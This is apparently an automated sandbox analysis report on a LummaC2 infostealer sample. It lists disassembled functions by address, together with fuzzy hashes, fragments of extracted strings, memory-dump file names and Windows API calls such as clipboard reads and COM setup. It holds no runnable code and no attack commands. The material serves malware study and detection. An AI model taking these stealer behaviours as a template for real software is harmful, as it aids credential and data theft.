Opcode Fuzzy Hash: 8568d7ea660b0219a95916221a51fa43584866879e859db9f3ca41c34994d2c8
Instruction Fuzzy Hash: BE3144357002154BCF00D7ADD584ABEBBE6EB84324B18812ADD1DD7341DB34EA86CBE9

Analysis Process: LummaC2.exePID: 792, Parent PID: 5756COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	63%
Total number of Nodes:	46
Total number of Limit Nodes:	2

Executed Functions

Function 009F5135 Relevance: 65.4, Strings: 52, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

J, xrefs: 009F5148
f, xrefs: 009F54C1
$, xrefs: 009F51E2
6, xrefs: 009F5164
., xrefs: 009F520C
:, xrefs: 009F51B8
n, xrefs: 009F54B3
V, xrefs: 009F5363
8, xrefs: 009F51C6
M, xrefs: 009F5435
l, xrefs: 009F5355
E, xrefs: 009F56F4
3, xrefs: 009F5427
(, xrefs: 009F5236
C, xrefs: 009F540B
4, xrefs: 009F5172
,, xrefs: 009F521A
*, xrefs: 009F55E8
], xrefs: 009F5347
^, xrefs: 009F54A5
v, xrefs: 009F53A9
, xrefs: 009F54DD
W, xrefs: 009F537F
w, xrefs: 009F5443
t, xrefs: 009F5451
<, xrefs: 009F51AA
R, xrefs: 009F547B
H, xrefs: 009F5156
f, xrefs: 009F54CF
J, xrefs: 009F53EF
F, xrefs: 009F56F8
k, xrefs: 009F532B
i, xrefs: 009F5371
(, xrefs: 009F55F0
0, xrefs: 009F518E
>, xrefs: 009F519C
\, xrefs: 009F5497
D, xrefs: 009F545F
M, xrefs: 009F53C5
, xrefs: 009F51FE
", xrefs: 009F51F0
{, xrefs: 009F539B
&, xrefs: 009F51D4
G, xrefs: 009F53FD
x, xrefs: 009F5419
*, xrefs: 009F5228
h, xrefs: 009F5489
2, xrefs: 009F5180
4, xrefs: 009F56DA
F, xrefs: 009F53D3
r, xrefs: 009F53E1
9, xrefs: 009F546D

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: $ $"$$$&$($($*$*$,$.$0$2$3$4$4$6$8$9$:$<$>$C$D$E$F$F$G$H$J$J$M$M$R$V$W$\$]$^$f$f$h$i$k$l$n$r$t$v$w$x${
API String ID: 0-1337114936
Opcode ID: e950d25d3a7b127d0a476d01161fbfe794670f6c9f8d0bf6a52432893022cdf3
Instruction ID: 55227aeb1c942d2707329095b99ac1f3d4508c6676e049498af96855a679db24
Opcode Fuzzy Hash: e950d25d3a7b127d0a476d01161fbfe794670f6c9f8d0bf6a52432893022cdf3
Instruction Fuzzy Hash: 7B2252219087E989DB32C67C8C087DDBEA15B27324F0843D9D1E96B3D2D7750B86CB66

Function 009C8720 Relevance: 7.7, APIs: 5, Instructions: 235
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 009C8744
GetCurrentThreadId.KERNEL32 ref: 009C874E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 009C8808
GetForegroundWindow.USER32 ref: 009C89A1
ExitProcess.KERNEL32 ref: 009C8A17

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: a56db0220f4fff60c6913c0d8e373b36a6a1e8aa0d295a1ddad306a1216b9070
Instruction ID: 461ef7e52eb1bd286f3d166bc9ff263800c2cced7fdeeff9d565aba57ae5d6e3
Opcode Fuzzy Hash: a56db0220f4fff60c6913c0d8e373b36a6a1e8aa0d295a1ddad306a1216b9070
Instruction Fuzzy Hash: E3714773E443145FD318EE69DC4235AB6CB9BC0710F1F813EA998EB395ED758C028692

Function 009FBAD0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(009FEA7B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 009FBAFE

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 009FC59C Relevance: 1.3, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9., xrefs: 009FC5F0

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: 9.
API String ID: 2994545307-3220845746
Opcode ID: c37b16e35f6ebc20ddaef2d4b97334fe892597f831155a9f3734f55b0abc062f
Instruction ID: 7de633df5a1573c6bd7b446b75538db1460a7ba18bfa837d6ca6687cf81ffde4
Opcode Fuzzy Hash: c37b16e35f6ebc20ddaef2d4b97334fe892597f831155a9f3734f55b0abc062f
Instruction Fuzzy Hash: 65114870A0421D8BDB14CF64DC547BA77E1FB59324F28E618D991E72E1C734AC068B40

Function 009FEEC0 Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b732733ea05045cf139fe2feee2ad24255e235f03b0498715dd21b4fddc36e4d
Instruction ID: c5a15dd949578107780f94274c093433f851926aef17a844b618437ae507d7fe
Opcode Fuzzy Hash: b732733ea05045cf139fe2feee2ad24255e235f03b0498715dd21b4fddc36e4d
Instruction Fuzzy Hash: A741097120530CAFE724CF65DCD1B7AB3AAEB89718F28452CE2C697261DA35BC12C745

Function 009FBC91 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 009FBCA2

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 353d412aa95ec2fa08624fa84551cae5c29c6a6ff79a5c8d6bd07194f50fda81
Instruction ID: 814f85f8daefa8cf52d71a52fa1855315a1da85cd83225889697e8683cfa9af6
Opcode Fuzzy Hash: 353d412aa95ec2fa08624fa84551cae5c29c6a6ff79a5c8d6bd07194f50fda81
Instruction Fuzzy Hash: C5E04FB5E025499FCB48CFA8EC505B977A1E75C3047044029E603C7360DB39A903CB18

Function 009FA080 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,7B1647F3,009C88F3,10130D9D), ref: 009FA090

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3c1030a0352d95b1b930bf664412860dce8d7756ae5537b7fbf792866e155738
Instruction ID: 8af636b3dbee1e574b0a05adc8cc6cc234bead68d6c69216d6064932394dc1b0
Opcode Fuzzy Hash: 3c1030a0352d95b1b930bf664412860dce8d7756ae5537b7fbf792866e155738
Instruction Fuzzy Hash: 09C04C31055121AAC6106B14EC09FCA3B55EF45350F154051B10466071CA706C829694

Non-executed Functions

Function 009F483C Relevance: 34.0, Strings: 27, Instructions: 298
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>, xrefs: 009F498A
b, xrefs: 009F4A7C
f, xrefs: 009F48B1
3, xrefs: 009F499E
<, xrefs: 009F4992
8, xrefs: 009F4982
_, xrefs: 009F4A84
b, xrefs: 009F4895
<, xrefs: 009F4A3A
n, xrefs: 009F4879
0, xrefs: 009F49A2
`, xrefs: 009F48A3
1, xrefs: 009F491A
f, xrefs: 009F4A8C
h, xrefs: 009F486B
:, xrefs: 009F497A
t, xrefs: 009F484F
O, xrefs: 009F4880
>, xrefs: 009F4A43
], xrefs: 009F4A94
d, xrefs: 009F48BF
), xrefs: 009F4946
2, xrefs: 009F499A
l, xrefs: 009F4887
j, xrefs: 009F485D
0, xrefs: 009F4B4D
?, xrefs: 009F48F0

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: )$0$0$1$2$3$8$:$<$<$>$>$?$O$]$_$`$b$b$d$f$f$h$j$l$n$t
API String ID: 0-3467771618
Opcode ID: cd577399b4b6fcba5114ddf0673a4d995f54070f2a8d8bf3c6661e5b652e7ea7
Instruction ID: 53f945b9282c6b949b2f074c4d05255d9a78bab642b8e769bc10278d564cee01
Opcode Fuzzy Hash: cd577399b4b6fcba5114ddf0673a4d995f54070f2a8d8bf3c6661e5b652e7ea7
Instruction Fuzzy Hash: C6E191219087E98EDB22CA7C88443DDBFB15B53324F1843D9D4E86B3D2C7754A86CB66

Function 009F6BF0 Relevance: 20.0, APIs: 10, Strings: 1, Instructions: 718memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00A0168C,00000000,00000001,00A0167C,00000000), ref: 009F6E11
SysAllocString.OLEAUT32(F5A3FBA8), ref: 009F6EDA
CoSetProxyBlanket.OLE32(D77F9D52,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009F6F18
SysAllocString.OLEAUT32(68DA6AD6), ref: 009F6F6D
SysAllocString.OLEAUT32(BD01C371), ref: 009F7025
VariantInit.OLEAUT32(F8FBFAF5), ref: 009F7097
SysFreeString.OLEAUT32(?), ref: 009F7382
SysFreeString.OLEAUT32(?), ref: 009F7388
SysFreeString.OLEAUT32(00000000), ref: 009F7399

Strings

\, xrefs: 009F6DCB

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: String$AllocFree$BlanketCreateInitInstanceProxyVariant
String ID: \
API String ID: 2737081056-2967466578
Opcode ID: 57898f8cc9bf38992adedf43ade848e7d788bd58d14b079b6104218f3a666c8a
Instruction ID: 0cfa3fc131f8022f2f9ec4e35891dc806a8564c2ff0ae795b8dde9e86ecd52a1
Opcode Fuzzy Hash: 57898f8cc9bf38992adedf43ade848e7d788bd58d14b079b6104218f3a666c8a
Instruction Fuzzy Hash: A7320F71A083449FD718CF68C880BABFBE5EFD5314F18892DE6D58B291D7749805CB92

Function 009CB14F Relevance: 15.5, Strings: 12, Instructions: 473COMMON

Download Yara Rule

Strings

7, xrefs: 009CB5E9
9D,J, xrefs: 009CB173
.L~R, xrefs: 009CB181
'H%N, xrefs: 009CB17A
DxY~, xrefs: 009CB1E0
6\/b, xrefs: 009CB19D
gTuZ, xrefs: 009CB18F
fPcV, xrefs: 009CB188
Kh;n, xrefs: 009CB1B8
;lMr, xrefs: 009CB1C2
EtEz, xrefs: 009CB1D6
BpAv, xrefs: 009CB1CC

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 'H%N$.L~R$6\/b$7$9D,J$;lMr$BpAv$DxY~$EtEz$Kh;n$fPcV$gTuZ
API String ID: 0-762781089
Opcode ID: 938933d72adebc38dc5d9d0321b87b32452029defb20b36ac05d924f292cea33
Instruction ID: b41cd4a1ad5b45970754d8fdadd8583fd6e99cab0c83f2c6a992cfc0d914bf05
Opcode Fuzzy Hash: 938933d72adebc38dc5d9d0321b87b32452029defb20b36ac05d924f292cea33
Instruction Fuzzy Hash: 3302BBB5600B05DFD720CF65D891B97BBE6FB89300F14896CD5AA8B7A0DB75A842CF40

Function 009D0F71 Relevance: 14.5, Strings: 11, Instructions: 732COMMON

Download Yara Rule

Strings

T, xrefs: 009D186A
F, xrefs: 009D0FF4
8, xrefs: 009D1571
x, xrefs: 009D17E7
5, xrefs: 009D144C
V, xrefs: 009D187A
}, xrefs: 009D0F7F
F, xrefs: 009D1743
E, xrefs: 009D1872
*, xrefs: 009D1579
t, xrefs: 009D12E2

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: *$5$8$E$F$F$T$V$t$x$}
API String ID: 0-2030276459
Opcode ID: 94bb86b2146f4f00b5b4adcd16f68ab8560925da63d47b442cb407cf881d2fcc
Instruction ID: 4057f44266411251e7aa1e64b372bdb8c29e9ec448d1cc74b4340d16a0720ad4
Opcode Fuzzy Hash: 94bb86b2146f4f00b5b4adcd16f68ab8560925da63d47b442cb407cf881d2fcc
Instruction Fuzzy Hash: AA528072A4D7908BC3249F78C4957AEFBE1ABC5314F198E2ED4D9C7392D63889418B43

Function 009E1550 Relevance: 14.2, Strings: 11, Instructions: 497COMMON

Download Yara Rule

Strings

k, xrefs: 009E1762
,, xrefs: 009E1A6C
\, xrefs: 009E1B06
d, xrefs: 009E1767
e, xrefs: 009E176C
U, xrefs: 009E1952
R, xrefs: 009E195C
[, xrefs: 009E1957
!@, xrefs: 009E1583
\, xrefs: 009E175D
P, xrefs: 009E1961

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: AllocateHeap
String ID: !@$,$P$R$U$[$\$\$d$e$k
API String ID: 1279760036-3655135053
Opcode ID: b708ca8470203242a03ec78849dbbc485906b08ae413d06b465e16d31b04965f
Instruction ID: b8389dec44c48c0556e1f2bb4701022aec9fc05b9e3885c7faddb7fde952c98f
Opcode Fuzzy Hash: b708ca8470203242a03ec78849dbbc485906b08ae413d06b465e16d31b04965f
Instruction Fuzzy Hash: 8F228C7160C7C08FD3268F29C4903AEBBE1AB9A314F184E2DE5D687392D7798845CB47

Function 009DE230 Relevance: 9.9, Strings: 7, Instructions: 1107COMMON

Download Yara Rule

Strings

FEtp, xrefs: 009DE5DF
f, xrefs: 009DE438
]^he, xrefs: 009DE55E
WYRT, xrefs: 009DE566
@Nxz, xrefs: 009DE536
pKp^, xrefs: 009DE54E
vvFE, xrefs: 009DE546

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: @Nxz$FEtp$WYRT$]^he$f$pKp^$vvFE
API String ID: 0-4211064948
Opcode ID: 64ff7d7bf7e888fcb5055a3f21fac8f7eff5761342275c125ba0cb95850a0ba2
Instruction ID: d944a416ec8c16479a53b39ea981f5e2c40ca9e2905543eaf1704231b26f3d65
Opcode Fuzzy Hash: 64ff7d7bf7e888fcb5055a3f21fac8f7eff5761342275c125ba0cb95850a0ba2
Instruction Fuzzy Hash: D672587550C3418FC725DF28C89062EBBE2AFD5314F18CA6EE4E58F392D6359906CB92

Function 009D5640 Relevance: 9.7, Strings: 7, Instructions: 943COMMON

Download Yara Rule

Strings

wq, xrefs: 009D6063
UR, xrefs: 009D5AE3
JHN], xrefs: 009D5D66
s|}, xrefs: 009D606E
YU]&, xrefs: 009D6170
Fi, xrefs: 009D5D71
>j%h, xrefs: 009D5976

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: >j%h$Fi$JHN]$UR$YU]&$s|}$wq
API String ID: 0-2664314784
Opcode ID: 97bb090994233a51428edfd2ed1b698ab64fcd44207096750aa97e9cf9ff8624
Instruction ID: 8b3fdbe33ea68a09550514bc8642fc1d73e3195b1f7729f6cf0dbc253b86f409
Opcode Fuzzy Hash: 97bb090994233a51428edfd2ed1b698ab64fcd44207096750aa97e9cf9ff8624
Instruction Fuzzy Hash: CF5238B19087408BD724DF28C851BAFB7E5FFD5314F198A2DE499873A1EB349902CB52

Function 009D1A94 Relevance: 9.3, Strings: 7, Instructions: 531COMMON

Download Yara Rule

Strings

', xrefs: 009D1AA7
1, xrefs: 009D1C89
%, xrefs: 009D1E31
;, xrefs: 009D1B11
U, xrefs: 009D205E
], xrefs: 009D1DB7
c, xrefs: 009D2059

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: %$'$1$;$U$]$c
API String ID: 0-3216539101
Opcode ID: 9571bda0105bcd8e11ca5abe8f62875fbfad0f90e88a36a1b7f8939d74e38d12
Instruction ID: d1a3c9b58c80d78d3b9fbb01596e9894e5692645c0da34157d71819e23f02db5
Opcode Fuzzy Hash: 9571bda0105bcd8e11ca5abe8f62875fbfad0f90e88a36a1b7f8939d74e38d12
Instruction Fuzzy Hash: 8C12A17290C7908BC7249F3884953AFBBE1ABD5320F158E2EE5E9873D1D6398945CB43

Function 009F1B10 Relevance: 9.2, APIs: 6, Instructions: 152clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 009F1B24
GetClipboardData.USER32 ref: 009F1B3F
GlobalLock.KERNEL32 ref: 009F1B58
GetWindowLongW.USER32 ref: 009F1BC7
GlobalUnlock.KERNEL32 ref: 009F1CE7
CloseClipboard.USER32 ref: 009F1CF4

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID:
API String ID: 2832541153-0
Opcode ID: 7207841f13028a4ebe2fca0733035ffd01e443f9a93e67ab6973c261ea6fbefc
Instruction ID: 9695843af5836e622cd70d205d315f058d1d6e477d94fbf64dde4bf219a25eb8
Opcode Fuzzy Hash: 7207841f13028a4ebe2fca0733035ffd01e443f9a93e67ab6973c261ea6fbefc
Instruction Fuzzy Hash: A251E07260C7858FC300AFBC988436EBAE1ABD5324F194B2DE6E5873D1D6788546C793

Function 009C9290 Relevance: 7.9, Strings: 6, Instructions: 429COMMON

Download Yara Rule

Strings

C, xrefs: 009C95B5
RRP\, xrefs: 009C96DE
clfg, xrefs: 009C92E2
CM, xrefs: 009C9608
Egx|, xrefs: 009C92CA
kj, xrefs: 009C9458

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: C$CM$Egx|$RRP\$clfg$kj
API String ID: 0-2969717086
Opcode ID: 7205f9d9b45afb0796eec4366d0d469d1e374ff805331be11343e4905182765d
